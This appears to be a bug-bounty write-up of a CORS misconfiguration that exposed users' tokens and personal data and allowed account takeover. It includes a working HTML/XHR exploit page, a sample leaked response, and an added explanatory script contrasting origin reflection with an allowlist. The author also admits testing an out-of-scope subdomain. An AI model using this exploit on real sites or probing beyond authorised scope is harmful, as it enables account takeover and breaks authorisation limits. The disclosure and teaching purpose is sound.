CORS Misconfiguration: Stealing the victim's token and PII leads to ATO

Hello Friends.

Today I will talk about a bug I found in July 2020 on a private program on HackerOne. The bug is called “Cross-Origin Resource Sharing (CORS) Misconfiguration”.

1-Firstly, what is CORS?

Cross-Origin Resource Sharing (CORS) is a mechanism that lets web browsers make cross-origin requests (via XMLHttpRequest or fetch) in a controlled manner. The browser adds an Origin header to such requests, identifying the site that initiated them, and the server answers with Access-Control-Allow-Origin (and optionally Access-Control-Allow-Credentials) to say which origins may read the response. If the server simply reflects any Origin it receives and also sets Access-Control-Allow-Credentials: true, then any website a logged-in victim visits can make an authenticated request to it and read the response, which is the misconfiguration this post exploits.
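To make the decision concrete, here is an added example (not code from the original post or from the affected program) that models both sides of CORS: what a server puts in the response and the check a browser performs before exposing a cross-origin response to page script. The origins, the allowlist, and the function names are constructed for illustration.

```javascript
// Added example: a minimal model of the CORS decision on both sides.
// corsHeadersReflecting()/corsHeadersAllowlist() model server behaviour,
// browserExposesResponse() models the browser's check. All origins below are
// constructed, not taken from the program in the write-up.

// Misconfigured server: reflect whatever Origin arrives and allow credentials.
// This is the pattern the post exploits: any site can send a credentialed
// request and read the authenticated response.
function corsHeadersReflecting(requestOrigin) {
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened server: exact-match allowlist of trusted origins. Anything else gets
// no CORS headers at all, so the browser blocks the read. Note that a suffix or
// regex check (e.g. /example\.com$/) would still match attacker-example.com,
// and "null" must never be allowed because sandboxed iframes send it.
const TRUSTED_ORIGINS = new Set([
  "https://app.example.com",
  "https://sso.example.com",
]);

function corsHeadersAllowlist(requestOrigin) {
  if (!TRUSTED_ORIGINS.has(requestOrigin)) {
    return {};
  }
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    // ACAO varies per request, so caches must not serve one origin's answer to another
    "Vary": "Origin",
  };
}

// Browser side: may a page at pageOrigin read this response?
// For a credentialed request the browser requires ACAO to equal the page
// origin exactly ("*" is rejected) and ACAC to be exactly "true".
function browserExposesResponse(responseHeaders, pageOrigin, withCredentials) {
  const acao = responseHeaders["Access-Control-Allow-Origin"];
  const acac = responseHeaders["Access-Control-Allow-Credentials"];
  if (acao === undefined) return false;
  if (withCredentials) {
    return acao === pageOrigin && acac === "true";
  }
  return acao === "*" || acao === pageOrigin;
}

// Simulate an attacker page fetching the victim's profile with the victim's cookie
// (withCredentials = true) against a server using the given policy.
function attackerCanReadProfile(serverPolicy, attackerOrigin) {
  const headers = serverPolicy(attackerOrigin);
  return browserExposesResponse(headers, attackerOrigin, true);
}

const ATTACKER = "https://attacker.example"; // constructed attacker origin

console.log("reflecting server, attacker can read:",
  attackerCanReadProfile(corsHeadersReflecting, ATTACKER)); // true
console.log("allowlist server, attacker can read:",
  attackerCanReadProfile(corsHeadersAllowlist, ATTACKER)); // false
console.log("allowlist server, trusted origin can read:",
  attackerCanReadProfile(corsHeadersAllowlist, "https://app.example.com")); // true
```

The same browser rule is why "Access-Control-Allow-Origin: *" together with credentials is not exploitable on its own: the browser refuses to expose a credentialed response to a wildcard. Reflection of an arbitrary Origin, as in the post, is the dangerous case.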


2-Program Scope

After reviewing the program scope, I concluded that all subdomains are out of scope; only the main domain is in scope.

3-Steps To Reproduce

Day one: I started hunting on the main domain, understanding how the program's services work and testing for bugs, but the site was quite secure.

Day two: I went back to my testing again. When I viewed the source code, I noticed a subdomain in the code named
I knew it was out of scope, but my mind told me to test it.
The subdomain does not have a registration page; I could just log in with my account from the main domain (SSO).

After logging in, I found this request:

It printed PII in the response: token, email, user info, etc.
Then I noticed “Access-Control-Allow-Credentials: true” in the response, so I changed the Origin header: I deleted it and added a new one, and it worked!

Then I edited the GraphQL request to steal more info.

4-Exploitation Code

<!DOCTYPE html>
<script>
function cors_exploit() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // readable cross-origin only because the server reflects our Origin and allows credentials
      alert(this.responseText);
      document.getElementById("cors").innerText = this.responseText;
    }
  };
  // the target host and endpoint path are not shown in the original; only the GraphQL query string is
  xhttp.open("GET", "{customer%20{id,...F2}}%20fragment%20F0%20on%20Customer%20{is_premier,is_premier_parent,premier_permissions,username,user_type,full_name,organization_id,customer_id,hostname,token,id}%20fragment%20F1%20on%20Customer%20{premier_permissions,is_premier_parent,id}%20fragment%20F2%20on%20Customer%20{username,full_name,email,is_admin,id,...F0,...F1}", true);
  xhttp.withCredentials = true; // send the victim's session cookie with the request
  xhttp.send();
}
</script>
<body onload="cors_exploit()">
<h2>Exploiting CORS Vulnerability</h2>
<h3>Extract SID</h3><div id="cors"></div>
<button type="button" onclick="cors_exploit()">Exploit</button>
</body>

Then I uploaded it to my website and it worked; the data was printed:

{
  "data": {
    "customer": {
      "id": "u285728853",
      "username": "storedthings133776",
      "full_name": null,
      "email": "",
      "is_admin": false,
      "is_premier": false,
      "is_premier_parent": false,
      "premier_permissions": [],
      "user_type": "core user",
      "organization_id": null,
      "customer_id": "285728853",
      "hostname": "",
      "token": "1/eyJjbGllbnRfaWQiOiI3YTE*****************"
    }
  },
  "extensions": {}
}

5-The Token

With the token, the attacker could access the victim's account, perform any action on the victim's behalf, and query other endpoints in the API.


Nov 19th: Report Sent

Nov 20th: Triaged

Nov 20th: rewarded

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

That's all, thank you very much for reading to the end. I hope you enjoyed it.

Thanks to @elmrhaseel @ayoubakup @Moroccan-Bugbounty-Hunters
